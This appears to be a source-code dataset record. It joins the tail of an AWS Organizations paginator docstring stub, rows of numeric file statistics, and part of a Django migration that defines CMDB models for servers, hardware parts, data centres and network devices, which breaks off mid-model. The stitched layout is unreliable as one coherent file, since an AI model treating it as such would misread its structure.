                    'StartingToken': 'string'
                }
            )

        Each page of the response is a dict with a ``Targets`` key: a list of
        structures describing the roots, OUs, and accounts that the specified
        policy is attached to. Each target dict contains ``TargetId``, ``Arn``,
        ``Name``, and ``Type`` (``'ACCOUNT'|'ORGANIZATIONAL_UNIT'|'ROOT'``).

        :type PolicyId: string
        :param PolicyId: **[REQUIRED]**
            The unique identifier (ID) of the policy for which you want to
            know its attachments. The
            `regex pattern <http://wikipedia.org/wiki/regex>`__ for a policy
            ID string requires "p-" followed by from 8 to 128 lower-case
            letters or digits.

        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.

            - **MaxItems** *(integer)* -- The total number of items to return.
              If more items are available than this value, a ``NextToken`` is
              provided in the output so that pagination can be resumed.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- A token to specify where to start
              paginating; this is the ``NextToken`` from a previous response.

        :rtype: dict
        :returns:
        """
        pass
| 61.280428
| 493
| 0.577945
| 6,858
| 62,935
| 5.268008
| 0.072908
| 0.01121
| 0.014172
| 0.015943
| 0.855126
| 0.843307
| 0.826257
| 0.814161
| 0.806217
| 0.800985
| 0
| 0.008516
| 0.333916
| 62,935
| 1,026
| 494
| 61.340156
| 0.853316
| 0.847446
| 0
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.309524
| false
| 0.309524
| 0.071429
| 0
| 0.690476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
0fd5cab9af7d7775ad8bcc60661c8aa38cdd8ec3
| 43,480
|
py
|
Python
|
cmdb/migrations/0001_initial.py
|
longgeek/muop_v1
|
e1dda2261384afb51429cfe1efbabdf17c2bbba0
|
[
"Apache-2.0"
] | null | null | null |
cmdb/migrations/0001_initial.py
|
longgeek/muop_v1
|
e1dda2261384afb51429cfe1efbabdf17c2bbba0
|
[
"Apache-2.0"
] | null | null | null |
cmdb/migrations/0001_initial.py
|
longgeek/muop_v1
|
e1dda2261384afb51429cfe1efbabdf17c2bbba0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2019-06-11 10:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('appconf', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AgentCompare',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('table', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u8868')),
('uuid', models.CharField(blank=True, max_length=100, verbose_name='UUID')),
('column', models.CharField(blank=True, max_length=50, verbose_name='\u5b57\u6bb5\u540d')),
('db_value', models.CharField(max_length=255, null=True, verbose_name='\u539f\u503c')),
('agent_value', models.CharField(max_length=255, null=True, verbose_name='\u65b0\u503c')),
('operation', models.CharField(blank=True, max_length=255, verbose_name='\u64cd\u4f5c')),
],
),
migrations.CreateModel(
name='Cabinet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='\u673a\u67dc')),
('desc', models.CharField(blank=True, max_length=100, verbose_name='\u63cf\u8ff0')),
],
),
migrations.CreateModel(
name='Fitting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingCard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('card_type', models.CharField(blank=True, max_length=50, verbose_name='\u677f\u5361\u7c7b\u578b')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingDisk',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('cache', models.CharField(blank=True, max_length=50, verbose_name='\u7f13\u5b58')),
('speed', models.CharField(blank=True, max_length=50, verbose_name='\u8f6c\u901f')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u5bb9\u91cf')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.CharField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('drive_letter', models.CharField(blank=True, max_length=100, verbose_name='\u76d8\u7b26')),
('level', models.CharField(blank=True, max_length=100, verbose_name='Raid\u7ea7\u522b')),
('slot_id', models.CharField(blank=True, max_length=100, verbose_name='\u76d8\u69fd')),
('state', models.CharField(blank=True, max_length=100, verbose_name='\u72b6\u6001')),
('type', models.CharField(blank=True, max_length=50, verbose_name='HDDorSSD')),
('vendor', models.CharField(blank=True, max_length=100, verbose_name='\u5382\u5bb6')),
('temperature', models.TextField(blank=True, max_length=50, verbose_name='\u6e29\u5ea6')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingGPU',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u663e\u5b58\u5bb9\u91cf')),
('frequency', models.CharField(blank=True, max_length=50, verbose_name='\u6838\u5fc3\u9891\u7387')),
('bus_id', models.CharField(blank=True, max_length=50, verbose_name='\u603b\u7ebfID')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fitting_type', models.CharField(blank=True, max_length=50, verbose_name='\u914d\u4ef6\u7c7b\u578b')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('operation', models.CharField(blank=True, max_length=50, verbose_name='\u64cd\u4f5c')),
('old_belong', models.CharField(blank=True, max_length=100, verbose_name='\u65e7\u5c5e\u4e3b')),
('new_belong', models.CharField(blank=True, max_length=100, verbose_name='\u65b0\u5c5e\u4e3b')),
('user', models.CharField(blank=True, max_length=50, verbose_name='\u64cd\u4f5c\u4eba')),
('time', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingMemory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('mem_type', models.CharField(blank=True, max_length=50, verbose_name='\u5185\u5b58\u7c7b\u578b')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u5bb9\u91cf')),
('frequency', models.CharField(blank=True, max_length=50, verbose_name='\u4e3b\u9891')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingMOD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('speed', models.CharField(blank=True, max_length=50, verbose_name='\u901f\u7387')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingNIC',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('name', models.CharField(blank=True, max_length=50, verbose_name='\u7f51\u5361\u540d\u79f0')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('speed', models.CharField(blank=True, max_length=50, verbose_name='\u4f20\u8f93\u901f\u7387')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('bus_type', models.CharField(blank=True, max_length=50, verbose_name='\u603b\u7ebf\u7c7b\u578b')),
('nicip', models.CharField(blank=True, max_length=50, verbose_name='Ip\u5730\u5740')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingPower',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('name', models.CharField(blank=True, max_length=100, verbose_name='\u7535\u6e90\u540d\u5b57')),
('power', models.CharField(blank=True, max_length=50, verbose_name='\u529f\u7387')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingRaid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('level', models.CharField(blank=True, max_length=50, verbose_name='Raid\u7ea7\u522b')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('cache', models.CharField(blank=True, max_length=50, verbose_name='\u7f13\u5b58')),
('bios_version', models.CharField(blank=True, max_length=50, verbose_name='BIOS\u7248\u672c')),
('device_interface', models.CharField(blank=True, max_length=50)),
('device_present', models.CharField(blank=True, max_length=50)),
('host_interface', models.CharField(blank=True, max_length=50)),
('raid_level_supported', models.CharField(blank=True, max_length=50, verbose_name='raid\u652f\u6301\u7b49\u7ea7')),
('supported_drives', models.CharField(blank=True, max_length=50)),
('vd_degraded', models.CharField(blank=True, max_length=50)),
('vd_drives', models.CharField(blank=True, max_length=50)),
('vd_offline', models.CharField(blank=True, max_length=50)),
('virtual_drive_info', models.TextField(blank=True)),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FittingSSD',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.CharField(blank=True, max_length=50, verbose_name='UUID')),
('sn', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6SN')),
('fitting_status', models.IntegerField(choices=[(-1, '\u5f85\u786e\u8ba4'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u5907\u4ef6\u72b6\u6001')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u5907\u4ef6\u578b\u53f7')),
('capacity', models.CharField(blank=True, max_length=50, verbose_name='\u5bb9\u91cf')),
('interface_type', models.CharField(blank=True, max_length=50, verbose_name='\u63a5\u53e3\u7c7b\u578b')),
('discard_time', models.DateTimeField(blank=True, null=True)),
('is_whole', models.BooleanField(default=False)),
('is_wrong', models.BooleanField(default=False)),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='FlowUpdateLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(blank=True, max_length=255, verbose_name='\u53d8\u66f4\u5185\u5bb9')),
('updater', models.CharField(blank=True, max_length=50, verbose_name='\u64cd\u4f5c\u4eba')),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Host',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hostname', models.CharField(max_length=50, verbose_name='\u4e3b\u673a\u540d')),
('ip', models.GenericIPAddressField(null=True, verbose_name='\u7ba1\u7406IP')),
('other_ip', models.CharField(blank=True, max_length=100, verbose_name='\u5176\u5b83IP')),
('domain', models.CharField(blank=True, max_length=255, verbose_name='\u57df\u540d')),
('asset_no', models.CharField(blank=True, max_length=50, verbose_name='\u8d44\u4ea7\u7f16\u53f7')),
('asset_type', models.IntegerField(choices=[(1, '\u56fa\u8d44'), (2, '\u501f\u8d27'), (3, '\u4f9b\u5e94\u5546')], null=True, verbose_name='\u8bbe\u5907\u7c7b\u578b')),
('status', models.IntegerField(choices=[(-2, '\u5f85\u786e\u8ba4'), (-1, '\u79bb\u7ebf'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f')], null=True, verbose_name='\u8bbe\u5907\u72b6\u6001')),
('os', models.CharField(blank=True, max_length=100, verbose_name='\u64cd\u4f5c\u7cfb\u7edf')),
('vendor', models.CharField(blank=True, max_length=50, verbose_name='\u8bbe\u5907\u5382\u5546')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u8bbe\u5907\u578b\u53f7')),
('cpu_model', models.CharField(blank=True, max_length=100, verbose_name='CPU\u578b\u53f7')),
('cpu_num', models.CharField(blank=True, max_length=100, verbose_name='CPU\u6570\u91cf')),
('memory', models.CharField(blank=True, max_length=30, verbose_name='\u5185\u5b58\u5927\u5c0f')),
('disk', models.CharField(blank=True, max_length=255, verbose_name='\u786c\u76d8\u4fe1\u606f')),
('ssd', models.CharField(blank=True, max_length=255, verbose_name='SSD\u4fe1\u606f')),
('raid', models.CharField(blank=True, max_length=100, verbose_name='Raid\u5361')),
('sn', models.CharField(blank=True, max_length=60, verbose_name='SN\u53f7 \u7801')),
('sn_mac', models.CharField(blank=True, max_length=100, verbose_name='\u8bbe\u5907\u552f\u4e00\u7f16\u53f7')),
('bmc_address', models.CharField(blank=True, max_length=100, verbose_name='\u5e26\u5916\u7ba1\u7406')),
('nic', models.CharField(blank=True, max_length=100, verbose_name='\u7f51\u5361')),
('manage_nic_mac', models.CharField(blank=True, max_length=100, verbose_name='\u7ba1\u7406\u7f51\u5361Mac')),
('arrive_time', models.DateTimeField(blank=True, null=True)),
('order_no', models.CharField(blank=True, max_length=100, verbose_name='\u8ba2\u5355\u7f16\u53f7')),
('contract_no', models.CharField(blank=True, max_length=100, verbose_name='\u5408\u540c\u7f16\u53f7')),
('warranty_period', models.DateTimeField(blank=True, null=True)),
('power', models.CharField(blank=True, max_length=200, verbose_name='\u7535\u6e90')),
('floor', models.CharField(blank=True, max_length=100, verbose_name='\u697c\u5c42')),
('room', models.CharField(blank=True, max_length=100, verbose_name='\u623f\u95f4')),
('cabinet_col', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u67dc\u5217')),
('cabinet_num', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u67dc\u53f7')),
('position', models.CharField(blank=True, max_length=100, verbose_name='\u5177\u4f53U\u4f4d')),
('pod', models.CharField(blank=True, max_length=50, verbose_name='POD')),
('height', models.CharField(blank=True, max_length=100, verbose_name='\u8bbe\u5907\u9ad8\u5ea6')),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('deleted_at', models.DateTimeField(blank=True, null=True)),
('is_wrong', models.BooleanField(default=False)),
('wrong_info', models.TextField(blank=True, max_length=255, verbose_name='\u5f02\u5e38\u5bf9\u6bd4')),
('is_confirmed', models.BooleanField(default=False)),
('role', models.CharField(blank=True, max_length=50, verbose_name='\u65f7\u89c6\u89d2\u8272')),
('kernel_version', models.CharField(blank=True, max_length=100, verbose_name='\u5185\u6838\u7248\u672c')),
('os_disk', models.CharField(blank=True, max_length=100, verbose_name='OS\u5185\u786c\u76d8')),
('usage_person', models.CharField(blank=True, max_length=100, verbose_name='\u4f7f\u7528\u4eba')),
('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='appconf.Product', verbose_name='\u6240\u5c5e\u90e8\u95e8')),
],
),
migrations.CreateModel(
name='HostGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True, verbose_name='\u670d\u52a1\u5668\u7ec4\u540d')),
('desc', models.CharField(blank=True, max_length=100, verbose_name='\u63cf\u8ff0')),
('serverList', models.ManyToManyField(blank=True, to='cmdb.Host', verbose_name='\u6240\u5728\u670d\u52a1\u5668')),
],
),
migrations.CreateModel(
name='Idc',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ids', models.CharField(max_length=255, unique=True, verbose_name='\u673a\u623f\u6807\u8bc6')),
('name', models.CharField(max_length=255, unique=True, verbose_name='\u673a\u623f\u540d\u79f0')),
('address', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u623f\u5730\u5740')),
('tel', models.CharField(blank=True, max_length=30, verbose_name='\u673a\u623f\u7535\u8bdd')),
('contact', models.CharField(blank=True, max_length=30, verbose_name='\u5ba2\u6237\u7ecf\u7406')),
('contact_phone', models.CharField(blank=True, max_length=30, verbose_name='\u79fb\u52a8\u7535\u8bdd')),
('jigui', models.CharField(blank=True, max_length=30, verbose_name='\u673a\u67dc\u4fe1\u606f')),
('ip_range', models.CharField(blank=True, max_length=30, verbose_name='IP\u8303\u56f4')),
('bandwidth', models.CharField(blank=True, max_length=30, verbose_name='\u63a5\u5165\u5e26\u5bbd')),
('memo', models.TextField(blank=True, max_length=200, verbose_name='\u5907\u6ce8\u4fe1\u606f')),
('pdu_type', models.IntegerField(choices=[(1, '\u6b27\u6807'), (2, '\u56fd\u6807'), (3, 'C14-13 * 2')], null=True, verbose_name='PDU\u7c7b\u578b')),
('pdu_num', models.CharField(blank=True, max_length=100, verbose_name='\u63d2\u53e3\u6570\u91cf')),
('bear_media', models.IntegerField(choices=[(1, '\u89d2\u94c1'), (2, '\u6258\u76d8'), (3, '\u5176\u5b83')], null=True, verbose_name='\u627f\u91cd\u4ecb\u8d28')),
('bear_weight', models.CharField(blank=True, max_length=100, verbose_name='\u627f\u91cd\u516c\u65a4')),
('workday_response', models.CharField(blank=True, max_length=100, verbose_name='\u5de5\u4f5c\u65e5\u54cd\u5e94\u65f6\u95f4')),
('holiday_response', models.CharField(blank=True, max_length=100, verbose_name='\u8282\u5047\u65e5\u54cd\u5e94\u65f6\u95f4')),
('use_cabinet_num', models.CharField(blank=True, max_length=100, verbose_name='\u4f7f\u7528\u673a\u67dc\u603b\u6570')),
('free_cabinet_num', models.CharField(blank=True, max_length=100, verbose_name='\u7a7a\u95f2\u673a\u67dc\u603b\u6570')),
('maintain_service', models.CharField(blank=True, max_length=100, verbose_name='\u4ee3\u7ef4\u670d\u52a1\u5546')),
('maintain_contact', models.CharField(blank=True, max_length=100, verbose_name='\u4ee3\u7ef4\u8054\u7cfb\u65b9\u5f0f')),
('delivery_address', models.CharField(blank=True, max_length=100, verbose_name='\u6536\u8d27\u5730\u5740')),
('data_center', models.CharField(blank=True, max_length=100, verbose_name='\u6570\u636e\u4e2d\u5fc3\u4ed3\u5e93')),
('carrier', models.IntegerField(choices=[(1, '\u8054\u901a'), (2, '\u79fb\u52a8'), (3, '\u7535\u4fe1'), (4, 'BGP'), (5, '\u5176\u5b83')], null=True, verbose_name='\u8fd0\u8425\u5546\u540d\u79f0')),
('extra_service', models.CharField(blank=True, max_length=100, verbose_name='\u9644\u52a0\u670d\u52a1')),
('search_path', models.CharField(max_length=200, null=True, verbose_name='\u67e5\u8be2\u8def\u5f84')),
],
options={
'verbose_name': '\u6570\u636e\u4e2d\u5fc3',
'verbose_name_plural': '\u6570\u636e\u4e2d\u5fc3',
},
),
migrations.CreateModel(
name='InterFace',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('vendor', models.CharField(max_length=30, null=True)),
('bandwidth', models.CharField(max_length=30, null=True)),
('tel', models.CharField(max_length=30, null=True)),
('contact', models.CharField(max_length=30, null=True)),
('startdate', models.DateField()),
('enddate', models.DateField()),
('price', models.IntegerField(verbose_name='\u4ef7\u683c')),
],
),
migrations.CreateModel(
name='IpSource',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('net', models.CharField(max_length=30)),
('subnet', models.CharField(max_length=30, null=True)),
('describe', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='NetDevice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.CharField(blank=True, max_length=100, verbose_name='\u7ba1\u7406IP')),
('sn', models.CharField(blank=True, max_length=60, verbose_name='SN\u53f7 \u7801')),
('model', models.CharField(blank=True, max_length=50, verbose_name='\u578b\u53f7')),
('device_type', models.CharField(blank=True, max_length=50, verbose_name='\u7c7b\u578b')),
('asset_type', models.IntegerField(choices=[(1, '\u56fa\u8d44'), (2, '\u501f\u8d27'), (3, '\u4f9b\u5e94\u5546')], null=True, verbose_name='\u8d44\u4ea7\u7c7b\u578b')),
('position', models.CharField(blank=True, max_length=100, verbose_name='\u673a\u67b6\u4f4d')),
('power', models.CharField(blank=True, max_length=200, verbose_name='\u7535\u6e90')),
('height', models.CharField(blank=True, max_length=100, verbose_name='\u8bbe\u5907\u9ad8\u5ea6')),
('os', models.CharField(blank=True, max_length=255, verbose_name='\u64cd\u4f5c\u7cfb\u7edf')),
('hostname', models.CharField(blank=True, max_length=50, verbose_name='\u4e3b\u673a\u540d')),
('port_num', models.CharField(blank=True, max_length=50, verbose_name='\u7aef\u53e3\u6570\u91cf')),
('vendor', models.CharField(blank=True, max_length=100, verbose_name='\u5382\u5546')),
('arch_type', models.CharField(blank=True, max_length=100, verbose_name='\u67b6\u6784\u7c7b\u578b')),
('usage', models.CharField(blank=True, max_length=100, verbose_name='\u7528\u9014')),
('sw_version', models.CharField(blank=True, max_length=100, verbose_name='\u8f6f\u4ef6\u7248\u672c\u53f7')),
('status', models.IntegerField(choices=[(-2, '\u5f85\u786e\u8ba4'), (-1, '\u79bb\u7ebf'), (1, '\u5728\u7528'), (2, '\u95f2\u7f6e'), (3, '\u51fa\u5e93'), (4, '\u7ef4\u4fee'), (5, '\u62a5\u5e9f'), (6, '\u5728\u7528(\u975e\u81ea\u52a8\u6293\u53d6)')], null=True, verbose_name='\u8bbe\u5907\u72b6\u6001')),
('arrive_time', models.DateTimeField(blank=True, null=True)),
